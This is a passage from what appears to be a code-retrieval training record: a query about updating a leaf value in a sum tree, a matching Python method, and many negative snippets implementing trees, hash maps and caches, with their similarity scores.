index:\r\n check_node = check_node.left_child\r\n else:\r\n check_node = self.select(index - size_left_tree - 1, source=check_node.right_child)\r\n break\r\n\r\n return check_node", "def max_child(self, index):\n if self.empty():\n return None\n if self._has_left(index):\n left = self._left(index)\n large = left\n if self._has_right(index):\n right = self._right(index)\n if self._data[right] == self._data[left]:\n large = right\n if self._data[right] > self._data[left]:\n large = right\n return large\n return None", "def label(tree):\n return tree[0]" ]
[ "0.7675132", "0.75705653", "0.748514", "0.748514", "0.7377657", "0.7373278", "0.7160219", "0.7113328", "0.70526975", "0.7030114", "0.67928636", "0.66183364", "0.64346117", "0.6430315", "0.64223456", "0.641513", "0.63261515", "0.6309149", "0.62792677", "0.62526083", "0.62493974", "0.6237695", "0.6175561", "0.61753166", "0.6166387", "0.6154276", "0.6146972", "0.61346895", "0.61200714", "0.60988206", "0.6062117", "0.6055712", "0.6055579", "0.60377115", "0.60296136", "0.6028257", "0.6018229", "0.60091597", "0.5966537", "0.5957525", "0.5942483", "0.59392947", "0.5930703", "0.5927332", "0.5915626", "0.5912121", "0.5901098", "0.58950603", "0.5887997", "0.5882166", "0.5881767", "0.58619696", "0.58599573", "0.5859046", "0.585512", "0.5844044", "0.58418965", "0.5836339", "0.5827923", "0.58225924", "0.5815393", "0.5806067", "0.5803959", "0.5803959", "0.58010834", "0.57795817", "0.5775533", "0.57635444", "0.57592916", "0.5756667", "0.57522535", "0.5752135", "0.5751784", "0.5747761", "0.5737169", "0.5724976", "0.5716569", "0.5707117", "0.56895524", "0.5683614", "0.56826484", "0.56815416", "0.56805676", "0.5666986", "0.56539565", "0.56388414", "0.5627437", "0.5618474", "0.56173265", "0.56130105", "0.55980563", "0.558641", "0.558413", "0.55744934", "0.5573915", "0.5572044", "0.5568108", "0.55581033", "0.55470824", "0.5529908" ]
0.6483467
12
Sets the value of a leaf node and updates internal nodes accordingly. This operation takes O(log(capacity)).
def set(self, node_index, value): if value < 0.0: raise ValueError( 'Sum tree values should be nonnegative. Got {}'.format(value)) self.highest_set = max(node_index, self.highest_set) node_index = node_index + self.low_idx self.max_recorded_priority = max(value, self.max_recorded_priority) delta_value = value - self.nodes[node_index] # Now traverse back the tree, adjusting all sums along the way. for _ in reversed(range(self.depth)): # Note: Adding a delta leads to some tolerable numerical inaccuracies. self.nodes[node_index] += delta_value node_index = (node_index - 1) // 2 self.nodes[node_index] += delta_value assert node_index == 0, ('Sum tree traversal failed, final node index ' 'is not 0.')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def set_leaf_node(self, leaf_value):\n\n if not self.empty:\n try:\n node_key = self.node_key\n except AttributeError:\n node_key = '_'\n raise ValueError(\n 'Cannot modify a non-empty node. ' + \\\n 'If you meant to change type of node {}, '.format(node_key) + \\\n 'delete it first and then add an empty node with ' + \\\n 'the same key.')\n\n # check if leaf_value is a list-like object\n try:\n _ = iter(leaf_value)\n is_list = True\n except TypeError:\n is_list = False\n\n try:\n if is_list:\n leaf_value = [float(i) for i in leaf_value]\n else:\n leaf_value = float(leaf_value)\n except TypeError:\n raise TreeliteError('leaf_value parameter should be either a ' + \\\n 'single float or a list of floats')\n\n try:\n if is_list:\n _check_call(_LIB.TreeliteTreeBuilderSetLeafVectorNode(\n self.tree.handle,\n ctypes.c_int(self.node_key),\n c_array(ctypes.c_double, leaf_value),\n ctypes.c_size_t(len(leaf_value))))\n else:\n _check_call(_LIB.TreeliteTreeBuilderSetLeafNode(\n self.tree.handle,\n ctypes.c_int(self.node_key),\n ctypes.c_double(leaf_value)))\n self.empty = False\n except AttributeError:\n raise TreeliteError('This node has never been inserted into a tree; '\\\n + 'a node must be inserted before it can be a leaf node')", "def update(self, idx, value):\n idx = self.__capacity - 1 + idx\n self.__tree[idx] = value\n self.__update(idx)", "def update_recursive(self, leaf_value):\n # If it is not root, this node's parent should be updated first.\n if self._parent:\n self._parent.update_recursive(-leaf_value) # - leaf_value because the MCTS tree is a max-min tree\n self.update(leaf_value)", "def set(self, key, value):\n #try to lock the tree. If we succeed make sure\n #we dont lose updates from any other process\n if self._storage.lock():\n self._refresh_tree_ref()\n #get current top-level node and make a value-ref\n node = self._follow(self._tree_ref)\n value_ref = ValueRef(value)\n #insert and get new tree ref\n self._tree_ref = self._insert(node, key, value_ref)\n self._tree_ref = self._blacken(self._follow(self._tree_ref))", "def set_branch(self, value):\n self.update(value)", "def set(self, node, value):\n self.val[node] = value", "def update_recursive(self, leaf_value):\n # If it is not root, this node's parent should be updated first.\n if self._parent:\n self._parent.update_recursive(-leaf_value)\n self.update(leaf_value)", "def update_recursive(self, leaf_value):\n # If it is not root, this node's parent should be updated first.\n if self._parent:\n self._parent.update_recursive(-leaf_value)\n self.update(leaf_value)", "def update_recursive(self, leaf_value):\n # If it is not root, this node's parent should be updated first.\n if self._parent:\n self._parent.update_recursive(-leaf_value)\n self.update(leaf_value)", "def __setitem__(self, k, v):\n #if tree is empty\n if self.is_empty():\n # inherited from LinkedBinaryTree class\n # _Item(k, v) is inheritated from MapBase class\n leaf = self._add_root(self._Item(k,v)) \n else:\n p = self._subtree_search(self.root(), k)\n #if k is present in current tree\n if p.key() == k:\n #it's not p.value()!!\n p.element()._value = v\n self._rebalance_access(p)\n return\n #didn't find k in current tree; create a new object of Item\n # and add to either left or right of the last node searched\n else:\n item = self._Item(k, v)\n if k > p.key():\n leaf = self._add_right(p, item)\n else:\n leaf = self._add_left(p, item)\n self._rebalance_insert(leaf)", "def __setitem__(self, key, value):\n if self._root:\n self._setItemHelper(key, value, 
self._root)\n else:\n self._root = _Node(key, value)\n self._size += 1", "def __setitem__(self, idx: int, val: float) -> None:\n assert 0 <= idx < self.capacity, f\"idx={idx} capacity={self.capacity}\"\n\n # Index of the leaf to insert into (always insert in \"second half\"\n # of the tree, the first half is reserved for already calculated\n # reduction-values).\n idx += self.capacity\n self.value[idx] = val\n\n # Recalculate all affected reduction values (in \"first half\" of tree).\n idx = idx >> 1 # Divide by 2 (faster than division).\n while idx >= 1:\n update_idx = 2 * idx # calculate only once\n # Update the reduction value at the correct \"first half\" idx.\n self.value[idx] = self.operation(\n self.value[update_idx], self.value[update_idx + 1]\n )\n idx = idx >> 1 # Divide by 2 (faster than division).", "def _put(self, k, v, currNode):\n if k < currNode.key:\n if currNode.hasLeftChild():\n self._put(k, v, currNode.leftChild)\n else:\n currNode.leftChild = TreeNode(k, v, parent=currNode)\n\n elif k > currNode.key:\n if currNode.hasRightChild():\n self._put(k, v, currNode.rightChild)\n else:\n currNode.rightChild = TreeNode(k, v, parent=currNode)\n\n else:\n currNode.payload = v\n self.size -= 1", "def __setitem__(self, key, value):\n self.tree[key] = value", "def set_node(self, n, value):\n node = self.get_node(n)\n if node:\n node.value = value", "def update(\n self, index: Union[int, np.ndarray], value: Union[float, np.ndarray]\n ):\n\n tree_index = self.capacity + index\n self._tree[tree_index] = value\n\n # Propagate up the tree.\n parent = tree_index // 2\n while np.any(parent > 0):\n left = self._tree[2 * parent] # Children/sibling.\n right = self._tree[2 * parent + 1]\n # Note: Due to possible floating point error in the sum-tree case,\n # it's safer to recompute the parent nodes directly rather than to\n # accumulate an \"update\" up the tree which could be faster.\n self._tree[parent] = self.operation(left, right)\n parent = parent // 2", "def _set(self, node_hash, keypath, value, if_delete_subtrie=False):\n # Empty trie\n if node_hash == BLANK_HASH:\n if value:\n return self._hash_and_save(\n encode_kv_node(\n keypath, self._hash_and_save(encode_leaf_node(value))\n )\n )\n else:\n return BLANK_HASH\n nodetype, left_child, right_child = parse_node(self.db[node_hash])\n # Node is a leaf node\n if nodetype == LEAF_TYPE:\n # Keypath must match, there should be no remaining keypath\n if keypath:\n raise NodeOverrideError(\n \"Fail to set the value because the prefix of it's key\"\n \" is the same as existing key\"\n )\n if if_delete_subtrie:\n return BLANK_HASH\n return self._hash_and_save(encode_leaf_node(value)) if value else BLANK_HASH\n # node is a key-value node\n elif nodetype == KV_TYPE:\n # Keypath too short\n if not keypath:\n if if_delete_subtrie:\n return BLANK_HASH\n else:\n raise NodeOverrideError(\n \"Fail to set the value because it's key\"\n \" is the prefix of other existing key\"\n )\n return self._set_kv_node(\n keypath,\n node_hash,\n nodetype,\n left_child,\n right_child,\n value,\n if_delete_subtrie,\n )\n # node is a branch node\n elif nodetype == BRANCH_TYPE:\n # Keypath too short\n if not keypath:\n if if_delete_subtrie:\n return BLANK_HASH\n else:\n raise NodeOverrideError(\n \"Fail to set the value because it's key\"\n \" is the prefix of other existing key\"\n )\n return self._set_branch_node(\n keypath, nodetype, left_child, right_child, value, if_delete_subtrie\n )\n raise Exception(\"Invariant: This shouldn't ever happen\")", "def set(self, key, 
value):\n try:\n assert self.capacity > 0\n\n if key not in self.cache:\n node = Node(key, value)\n self.cache[key] = node\n\n self._enqueue(node)\n self.num_elements += 1\n\n if self._full_capacity():\n dequeued = self._dequeue()\n del self.cache[dequeued.key]\n self.num_elements -= 1\n\n else:\n # Overwrite value if the key already exists\n # and re-enqueued to indicate recently used\n self.cache[key].value = value\n self._re_enqueue(self.cache[key])\n except AssertionError as error:\n print(\"WARNING: Can't perform operations on <= 0 capacity cache\")", "def put(self, key, value):\n if key is None:\n return\n self.root = put_in_subtree(self.root, key, value)\n self.root.colour = False # make sure that the root is black", "def put(self, key: int, value: int) -> None:\n idx = key % 1000\n if not self.map[idx]:\n self.map[idx] = Node(key, value)\n else:\n curr = self.map[idx]\n while True:\n if curr.key == key:\n curr.val = value\n return\n if not curr.next:\n break\n curr = curr.next\n curr.next = Node(key, value)", "def update(self, leaf_value,visits_count=1):\n # Count visit.\n self._n_visits += visits_count\n # Update Q, a running average of values for all visits.\n self._Q += 1.0*(leaf_value - self._Q) / self._n_visits\n\n if self.is_root():\n self.last_leafvalue = leaf_value", "def change_leaf_value(self, general_node, hasElement):\n raise NotImplementedError", "def update(self, tree_path, value):\n\t\traise NotImplementedError", "def cell_setLeaf(self, curr):\r\n curr.n_count = 0\r\n return", "def update(self, leaf_value):\n # Count visit.\n self._n_visits += 1\n # Update Q, a running average of values for all visits.\n self._Q += 1.0*(leaf_value - self._Q) / self._n_visits", "def update(self, leaf_value):\n # Count visit.\n self._n_visits += 1\n # Update Q, a running average of values for all visits.\n self._Q += 1.0 * (leaf_value - self._Q) / self._n_visits", "def set_val(self, k, a):\n k += self.n - 1\n self.dat[k] = a\n while k > 0:\n k = (k - 1) // 2 # parent\n self.dat[k] = self.op(self.dat[k * 2 + 1], self.dat[k * 2 + 2])", "def update(self, leaf_value):\n # Count visit.\n self._n_visits += 1\n # Update Q, a running average of values for all visits. wtf ??? 
this line is rigth but kind of wired !\n self._Q += 1.0 * (leaf_value - self._Q) / self._n_visits", "def set_child(self, val, end=False):\n self._children[val] = TrieNode(val, end)", "def __setattr__(self, key, value):\n if '_children' in self.__dict__ and\\\n key in self.__dict__['_children'] and\\\n isinstance(value, int) and\\\n hasattr(self.__dict__['_children'][key], 'value'):\n getattr(self, key).value = value\n else:\n super().__setattr__(key, value)", "def change_leaf_value(self, place, has_element_new):\n self.has_element = has_element_new", "def __setitem__(self, key, value):\n\n if self.type is None:\n self.type = type(key)\n\n if type(key) != self.type:\n raise TypeError\n\n # e.g 'bat'\n first_char = key[:1] # 'b'\n others = key[1:] # 'at'\n\n # if hit last character of key\n\n if len(first_char) != 0 and len(others) == 0:\n # if not in children, add node and assign value\n\n if first_char not in self.children:\n node = Trie(value)\n self.children[first_char] = node\n node.type = self.type\n\n # just assign value\n else:\n node = self.children[first_char]\n node.value = value\n\n else:\n if first_char not in self.children:\n node = Trie()\n # creat new node for first_char\n self.children[first_char] = node\n node[others] = value # recurse for others\n node.type = self.type\n else:\n self.children[first_char][others] = value", "def updateTreeValues ( self, feature_column, feature_value, node_type, nodes, children = [ ] ):\n self.feature_column = feature_column\n self.feature_value = feature_value\n self.node_type = node_type\n self.nodes = nodes\n self.children = children\n # End updateTreeValues()", "def __init__(self, value: object) -> None:\n self.value = value # to store node's data\n self.left = None # pointer to root of left subtree\n self.right = None # pointer to root of right subtree", "def __init__(self, value: object) -> None:\n self.value = value # to store node's data\n self.left = None # pointer to root of left subtree\n self.right = None # pointer to root of right subtree", "def __setitem__(self, ngram, value):\n #N-gram is consumed element by element from first to last and each time this function will pass the rest of the n-gram to the next node.\n #When the n-gram is completely consumed, the current node will be marked a terminating node.\n \n #Base case: N-gram fully consumed and this node is at the end of the n-gram. Mark it as a terminating node.\n if len(ngram) == 0:\n self.end_of_ngram = True\n self.value = value\n #Recursive case: N-gram is still being consumed. 
Move on to next node.\n else:\n next_ele = ngram[0]\n rest_ngram = ngram[1:]\n\n #Create a new child node if the next element does not lead to anywhere and recurse on it.\n if next_ele not in self.children:\n self.children[next_ele] = _NGramMapNode()\n self.children[next_ele].__setitem__(rest_ngram, value)", "def put(self, key: int, value: int) -> None:\n pos = key % self.space\n head = self.hash_table[pos]\n curr = head\n\n while curr.next:\n if curr.next.key == key:\n curr.next.val = value\n return\n curr = curr.next\n\n curr.next = Node(key, value)", "def __call__(self, value):\n self.right.left = self.__class__(value)\n self.right.left.right = self.right\n self.right = self.right.left\n self.right.left = self", "def update(self, leaf_value):\n # Count visit.\n self._n_visits += 1\n # Update Q, a running average of values for all visits.", "def put(self, key: int, value: int) -> None:\n\n index = self.hash(key)\n\n # If there's no other values here, just chuck it in!\n if not self.map[index]:\n self.map[index] = lNode((key, value))\n\n # Otherwise, we either need to rewrite \n # existing node or chuck on end of list - i.e. we have collision\n else:\n # Check head first since we'll need curr.next\n curr = self.map[index]\n\n # rewrite value if it exists\n if curr.val[0] == key:\n curr.val = (key, value)\n\n # Otherwise chuck on end of list\n else:\n while curr.next:\n\n # Forgot condition here...\n if curr.next.val[0] == key:\n curr.next.val = (key, value)\n return\n\n curr = curr.next\n\n curr.next = lNode((key,value))", "def _put(self, key, value, current_node):\n pass", "def push(self, value):\n idx = self.__capacity - 1 + self.__size\n self.__tree[idx] = value\n self.__update(idx)\n self.__size += 1", "def _set(self, value):\n self._local._value = value\n if threading.current_thread() is self._root_thread:\n self._root_value = value", "def put(self, key: int, value: int) -> None:\n hashvalue = key % 1000\n \n if self.hashset[hashvalue] ==None:\n \n self.hashset[hashvalue]=Node((key,value))\n else :\n head= self.hashset[hashvalue]\n while head:\n k,v = head.data \n if k==key:\n head.data = (key,value)\n return \n if head.next==None:\n break\n else:\n head = head.next\n head.next= Node((key,value))", "def addBranch(self, value, node):\n self.branches[value] = node", "def root(self, value: List[int]):\n max_len = max((len(node) for node in self._nodes))\n self._root = value + (max_len - len(value)) * [0]", "def __init__(cell, value):\n\t\tcell.value = value\n\t\tcell.parent = None\n\t\tcell.visited = False", "def setCurrentNode(self, newNode):\r\n\t\tself.currentNode = newNode", "def __init__(self, value):\n self.value = value\n self.left = None\n self.right = None", "def __init__(self, value):\n self.value = value\n self.left = None\n self.right = None", "def set(self, value, index=0):\n\n # Error case: Index out of acceptable range\n if index < 0 or index >= self._size:\n raise RangeError(\"index out of range.\")\n\n i = 0\n current_node = self._head\n\n while(i < index):\n current_node = current_node.next\n i += 1\n\n current_node.value = value", "def _update_value_at(self, index, value):\n node = self._get_node_at(index)\n if node is None:\n raise IndexError('List index out of range.')\n node.value = value", "def setData(self,data):\n self.data=data\n self.leaf=True", "def put(self, item, value, set_doc):\n if item is None:\n raise Exception(\"call __setitem__ with None argument\")\n else:\n self.size += 1\n self.root = self.set(self.root, item, int(value), 0, set_doc)", "def 
_update_node(node, value):\n node.N += 1\n node.W += value\n node.Q = node.W / node.N", "def put(self, path, leaf):\n if len(path) == 0:\n if isinstance(leaf, DiscriminationTree):\n self.interiors.append(leaf)\n self.ints[leaf.index] = leaf\n else:\n self.leaves.append(leaf)\n return True\n else:\n next_index = path[0]\n next_disc_tree = self._child_at_index(next_index)\n if next_disc_tree is None:\n next_disc_tree = DiscriminationTree(next_index, parent=self)\n self.interiors.append(next_disc_tree)\n self.ints[next_disc_tree.index] = next_disc_tree\n next_disc_tree.put(path[1:], leaf)", "def set(self, key, data, expiration=None):\n node = self._get_node(key)\n\n if node:\n node.data = data\n else:\n if len(self) + 1 > self.max_size:\n node = self._pop()\n del self.map[node.key]\n\n node = Node(key, data, expiration)\n self._append(node)\n self.map[key] = node", "def put(self, key, value):\n # O(1) in best case and O(n) in worst case Time Complexity\n # O(1) in best case and O(n) in worst case Space Complexity\n\n currentNode = self.getElement(key)\n if (currentNode.next == None):\n currentNode.next = Node(key, value)\n else:\n currentNode.next.v = value\n return", "def put(self, key: int, value: int) -> None:\n hashKey = key % 1000\n if not self.bucket[hashKey]:\n self.bucket[hashKey] = LinkNode(key, value)\n else:\n node = self.bucket[hashKey]\n while node:\n if node.pair[0] == key:\n node.pair[1] = value\n return\n if not node.next:\n node.next = LinkNode(key, value)\n node = node.next", "def put(self, k: Any, v: Any):\n i = abs(hash(k)) % self.size\n current = self.data[i]\n while current is not None:\n if current.key == k:\n current.value = v\n return\n current = current.next\n new_node = self.Node(k, v)\n new_node.next = self.data[i]\n self.data[i] = new_node", "def set(self, path, value):\n pth = self._path[:]\n pth.extend(stringify_keys(path))\n set_nested(self._request.session, pth, value)\n # self._value = get_nested_default(self._dct, self._path)\n self.save()", "def set_by_path(root, path, value):\n \n sub_data = root\n for key in path[:-1]:\n sub_data = sub_data[key]\n sub_data[path[-1]] = value", "def set(self, key, value):\n validate_is_bytes(key)\n validate_is_bytes(value)\n\n self.root_hash = self._set(self.root_hash, encode_to_bin(key), value)", "def insert(self, val):\n if type(val) not in [int, float]:\n raise TypeError('This tree accepts numbers only.')\n if self.contains(val):\n raise ValueError('Node already in tree.')\n new_node = Node(val)\n if self._size == 0:\n self._root = new_node\n self._max_depth = 1\n self._rbal = 1\n self._lbal = 1\n else:\n current_depth = 1\n current_node = self._root\n while val is not current_node._data:\n current_depth += 1\n if val < current_node._data:\n if current_node._lkid:\n current_node = current_node._lkid\n else:\n current_node._lkid = new_node\n new_node._parent = current_node\n self._get_new_max()\n elif val > current_node._data:\n if current_node._rkid:\n current_node = current_node._rkid\n else:\n current_node._rkid = new_node\n new_node._parent = current_node\n self._get_new_max()\n self._size += 1", "def __setitem__(self, i: int, o: 'Tree') -> None:\n ...", "def __setitem__(self, t: Tuple[int, ...], o: 'Tree') -> None:\n ...", "def __init__(self, liste_leaf):\r\n list_leaf = liste_leaf\r\n while len(list_leaf) != 1:\r\n first_node = list_leaf[0]\r\n second_node = list_leaf[1]\r\n new_node = Node(first_node.freq + second_node.freq,\r\n None, first_node, second_node)\r\n del list_leaf[1]\r\n del list_leaf[0]\r\n position = 
0\r\n for index in range(0, len(list_leaf), 1):\r\n if new_node.freq >= list_leaf[index].freq:\r\n position += 1\r\n list_leaf.insert(position, new_node) \r\n self.root = list_leaf[0]\r\n #root attribute of the tree giving us the whole tree\r", "def assign(self, var, value):\n\t\tself._root = self._insert(self._root, var, value)", "def __setitem__(self, key, value):\n\n fi = self.arbor.field_info[key]\n ftype = fi.get('type')\n if ftype not in ['analysis', 'analysis_saved']:\n raise ArborUnsettableField(key, self.arbor)\n\n vector_fieldname = fi.get(\"vector_fieldname\", None)\n has_vector_field = vector_fieldname is not None\n\n if self.is_root:\n root = self\n tree_id = 0\n # if root, set the value in the arbor field storage\n self.arbor[key][self._arbor_index] = value\n if has_vector_field and vector_fieldname in self.arbor.field_data:\n del self.arbor.field_data[vector_fieldname]\n else:\n root = self.root\n tree_id = self.tree_id\n self.arbor._node_io.get_fields(self, fields=[key],\n root_only=False)\n data = root.field_data[key]\n data[tree_id] = value\n if has_vector_field and vector_fieldname in root.field_data:\n del root.field_data[vector_fieldname]", "def __init__(self, root_value):\n self.root = self.TreeNode(value=root_value)", "def __setitem__(self,key,value):\n assert isinstance(key,int)\n if isinstance(value,str):\n super().__setitem__(key,Node(key,value))\n else:\n assert value.nodeid == key\n super().__setitem__(key,value)", "def insertnode(self, node_path, node_val):\n\t\t# Get to the correct tree\n\t\tcurr_tree = self\n\t\tfor node_name in node_path[1:]:\n\t\t\tcurr_tree = curr_tree[node_name]\n\t\t\n\t\t# Allocate to tree (only once)\n\t\tif curr_tree.name == None:\n\t\t\tcurr_tree.name = node_path[-1]\n\t\t\tcurr_tree.value = node_val\n\t\telse:\n\t\t\tprint curr_tree.name\n\t\t\tprint node_path\n\t\t\tassert(False)", "def setval(self, newval) -> None:\n if self.val is None:\n self.val = newval\n else:\n raise RuntimeError('LocNode value set twice!')", "def insert(self, val):\n if not self.root:\n self.root = Node(val)\n self.size_number += 1\n else:\n self._sink(val, self.root)\n # check parent from node, until unbalanced.", "def set_value(self, key: keyType, new_value: valueType) -> None:\n self.validate(key, new_value)\n head_node_index, chain_node_index = self.exist_key(key)\n # \"head_node_index is equal to -1\" means that 'key' doesn't exist in dictionary object.\n if head_node_index == -1:\n self.add(key, new_value)\n else:\n self.hashTable[head_node_index].singlyLinkedList[chain_node_index].values = [new_value]", "def update_node(node, attribute, value):\n node.set(attribute, value)\n return", "def __init__(self, value, parent = None):\n # initialize new node\n self.value = value\n self.parent = parent\n self.left = None\n self.right = None\n self.height = 1", "def backPropogation(self, leafNode, value):\n node = leafNode\n while node != None:\n node.witnessValue(value)\n node = node.parent", "def add(self, value):\n # no root node: add node as root\n if self.root == None:\n self.root = Node(value, None)\n return\n\n # root already exists: find place of node to be added\n node = self.root\n while True:\n\n # left child: check if is already a leaf or not\n if value <= node.value:\n\n # current node is a leaf: add new node as left child\n if node.left == None:\n node.left = Node(value, node)\n self.rebalance(node)\n break\n\n # current node is not a leaf: descend to left child\n node = node.left\n\n # right child: check if is already a leaf or not\n else:\n\n # 
current node is a leaf: add new node as right child\n if node.right == None:\n node.right = Node(value, node)\n self.rebalance(node)\n break\n\n # current node is not a leaf: descend to right child\n node = node.right", "def put(self, key, value):\n index = key % self.size\n\n if not self.bucket[index]:\n self.bucket[index] = ListNode(key , value)\n else:\n cur = self.bucket[index]\n\n while cur:\n if cur.key == key:\n cur.val = value\n return\n if not cur.next: break\n cur = cur.next\n cur.next = ListNode(key, value)", "def set_node_value(self, val, i: int, j: int, key: str = 'target') -> None:\n if key not in self._dist:\n raise KeyError('key parameter must be a valid distribution: ' +\n '[\\'initial\\', \\'current\\', \\'target\\']')\n\n elif not self._status['target'] or not self._status['initial']:\n raise ValueError(\n 'No initial or target distribution has been defined.')\n\n mat_i, mat_j = to_matrix(self._param['n_v'], np.array([i, j]))\n self._dist[key][mat_i, mat_j] = val", "def add(self, value: object) -> None:\n if self.root is None: # If tree is empty\n self.root = TreeNode(value)\n return\n\n child_node = self.root\n parent_node = None\n while child_node is not None: # Traversing the tree\n parent_node = child_node\n if value < child_node.value:\n child_node = child_node.left\n\n else:\n child_node = child_node.right\n\n if value < parent_node.value:\n parent_node.left = TreeNode(value) # Add new node as child of parent\n\n else:\n parent_node.right = TreeNode(value)", "def __setitem__(self, key, value):\n list.__setitem__(self, key, self.convertNode(value))", "def put(self, key: int, value: int) -> None:\n index = key % 10000\n head = self.array[index]\n while head.next:\n head = head.next\n if head.key == key:\n head.value = value\n return\n head.next = LinkedListNode(key, value)", "def __setitem__(self, index, value):\n if isinstance(index, slice):\n del self[index]\n offset = 0\n if len(self) == 0:\n for x in value:\n self.append(x)\n else:\n for x in xrange(*index.indices(len(self))):\n self.__insert(x + offset, value)\n offset += value.length\n if not index.step:\n break\n return\n\n self.__verify_index(index)\n\n if index < 0:\n index += self.length\n\n index, prev_node, cur_node = self.__find_node_index(index)\n cur_node.data_list[index] = value", "def set(self, key, value):\r\n if not isinstance(key, str):\r\n raise TypeError(\"Key must be a string\")\r\n\r\n bin_num = self._get_bin(key)\r\n cur = self.bins[bin_num]\r\n\r\n if cur.next is None: # If first element is trailer node, insert here\r\n self._ensure_load()\r\n self.bins[bin_num] = Node((key, value), cur)\r\n success = True\r\n elif cur.value[0] == key: # If existing key, overwrite\r\n cur.value = (cur.value[0], value)\r\n success = False\r\n else: # Move towards end of linked list\r\n while cur.next is not None:\r\n prev = cur\r\n cur = cur.next\r\n self._ensure_load()\r\n prev.next = Node((key, value), cur)\r\n success = True\r\n\r\n if success:\r\n self.size += 1\r\n return success", "def backup(self, value):\n current = self\n while current.parent is not None:\n value *= -1\n current.number_visits += 1\n current.total_value += value\n current = current.parent", "def assign(self, value):\n self.value = value", "def _set_item_impl(self, key: Any, value: Any) -> None:\n from omegaconf.omegaconf import _maybe_wrap\n\n from .nodes import AnyNode, ValueNode\n\n if isinstance(value, Node):\n do_deepcopy = not self._get_flag(\"no_deepcopy_set_nodes\")\n if not do_deepcopy and isinstance(value, Container):\n # if 
value is from the same config, perform a deepcopy no matter what.\n if self._get_root() is value._get_root():\n do_deepcopy = True\n\n if do_deepcopy:\n value = copy.deepcopy(value)\n value._set_parent(None)\n\n try:\n old = value._key()\n value._set_key(key)\n self._validate_set(key, value)\n finally:\n value._set_key(old)\n else:\n self._validate_set(key, value)\n\n if self._get_flag(\"readonly\"):\n raise ReadonlyConfigError(\"Cannot change read-only config container\")\n\n input_config = isinstance(value, Container)\n target_node_ref = self._get_node(key)\n special_value = value is None or value == \"???\"\n\n input_node = isinstance(value, ValueNode)\n if isinstance(self.__dict__[\"_content\"], dict):\n target_node = key in self.__dict__[\"_content\"] and isinstance(\n target_node_ref, ValueNode\n )\n\n elif isinstance(self.__dict__[\"_content\"], list):\n target_node = isinstance(target_node_ref, ValueNode)\n # We use set_value if:\n # 1. Target node is a container and the value is MISSING or None\n # 2. Target node is a container and has an explicit ref_type\n # 3. If the target is a NodeValue then it should set his value.\n # Furthermore if it's an AnyNode it should wrap when the input is\n # a container and set when the input is an compatible type(primitive type).\n\n should_set_value = target_node_ref is not None and (\n (\n isinstance(target_node_ref, Container)\n and (special_value or target_node_ref._has_ref_type())\n )\n or (target_node and not isinstance(target_node_ref, AnyNode))\n or (isinstance(target_node_ref, AnyNode) and is_primitive_type(value))\n )\n\n def wrap(key: Any, val: Any) -> Node:\n is_optional = True\n if not is_structured_config(val):\n ref_type = self._metadata.element_type\n else:\n target = self._get_node(key)\n if target is None:\n if is_structured_config(val):\n ref_type = self._metadata.element_type\n else:\n is_optional = target._is_optional()\n ref_type = target._metadata.ref_type\n return _maybe_wrap(\n ref_type=ref_type,\n key=key,\n value=val,\n is_optional=is_optional,\n parent=self,\n )\n\n def assign(value_key: Any, val: ValueNode) -> None:\n assert val._get_parent() is None\n v = val\n v._set_parent(self)\n v._set_key(value_key)\n self.__dict__[\"_content\"][value_key] = v\n\n if input_node and target_node:\n # both nodes, replace existing node with new one\n assign(key, value)\n elif not input_node and target_node:\n # input is not node, can be primitive or config\n if should_set_value:\n self.__dict__[\"_content\"][key]._set_value(value)\n elif input_config:\n assign(key, value)\n else:\n self.__dict__[\"_content\"][key] = wrap(key, value)\n elif input_node and not target_node:\n # target must be config, replace target with input node\n assign(key, value)\n elif not input_node and not target_node:\n if should_set_value:\n self.__dict__[\"_content\"][key]._set_value(value)\n elif input_config:\n assign(key, value)\n else:\n self.__dict__[\"_content\"][key] = wrap(key, value)", "def update(self, feature_col, feature_value, node_type, nodes, children=[]):\n self.feature_col = feature_col\n self.feature_value = feature_value\n self.node_type = node_type\n self.nodes = nodes\n self.children = children", "def enqueue(self, value): ################# <-\n self.top = Node(value, next=self.top)", "def enqueue(self, value): ################# <-\n self.top = Node(value, next=self.top)", "def _finalize_leaf(self, node):\n node.value = -self.shrinkage * node.sum_gradients / (\n node.sum_hessians + self.splitter.l2_regularization)\n 
self.finalized_leaves.append(node)", "def set(cls, hierarchical_dict: dict, key: str, value: Any) -> None:\n # split according to '.'\n hierarchical_key = key.split(\".\")\n\n # go over the the dictionary according to the path, create the nodes that does not exist\n element = hierarchical_dict\n for key in hierarchical_key[:-1]:\n if key not in element:\n element[key] = {}\n element = element[key]\n\n # set the value\n element[hierarchical_key[-1]] = value", "def _set_entry(self, cvs_path, node):\n\n self._make_writable()\n self._set_entry(cvs_path, node)", "def set(self, key, value):\n self.log.debug(\"setting '%s' = '%s' on network\" % (key, value))\n dkey = digest(key)\n node = Node(dkey)\n\n def store(nodes):\n self.log.info(\"setting '%s' on %s\" % (key, list(map(str, nodes))))\n # if this node is close too, then store here as well\n if self.node.distanceTo(node) < max([n.distanceTo(node) for n in nodes]):\n self.storage[dkey] = value\n ds = [self.protocol.callStore(n, dkey, value) for n in nodes]\n d = defer.DeferredList(ds)\n d.addCallback(self._anyRespondSuccess)\n d.addErrback(self.onError)\n return d\n\n nearest = self.protocol.router.findNeighbors(node)\n if len(nearest) == 0:\n self.log.warning(\"There are no known neighbors to set key %s\" % key)\n return defer.succeed(False)\n spider = NodeSpiderCrawl(self.protocol, node, nearest, self.ksize, self.alpha)\n d = spider.find()\n d.addCallback(store)\n d.addErrback(self.onError)\n return d", "def set_value(self, new_value, borrow=False):\r\n if borrow:\r\n self.container.value = new_value\r\n else:\r\n self.container.value = copy.deepcopy(new_value)", "def update(self, value):\n orig = get_nested_default(self._request.session, self._path)\n orig.update(value)\n set_nested(self._request.session, self._path, orig)\n # self._value = get_nested_default(self._session, self._path)\n self.save()", "def __init__(self, capacity):\n assert isinstance(capacity, int)\n if capacity <= 0:\n raise ValueError(\n 'Sum tree capacity should be positive. Got: {}'.format(capacity))\n\n self.nodes = []\n self.depth = int(np.ceil(np.log2(capacity)))\n self.low_idx = (2**self.depth) - 1 # pri_idx + low_idx -> tree_idx\n self.high_idx = capacity + self.low_idx\n self.nodes = np.zeros(2**(self.depth + 1) - 1) # Double precision.\n self.capacity = capacity\n\n self.highest_set = 0\n\n self.max_recorded_priority = 1.0", "def add(self, value: object) -> None:\n #binary search tree == empty\n if self.root is None:\n self.root = TreeNode(value)\n return\n\n #variables loop/traverse bt\n child = self.root\n parent = None\n\n # place node via while loop\n while child is not None:\n parent = 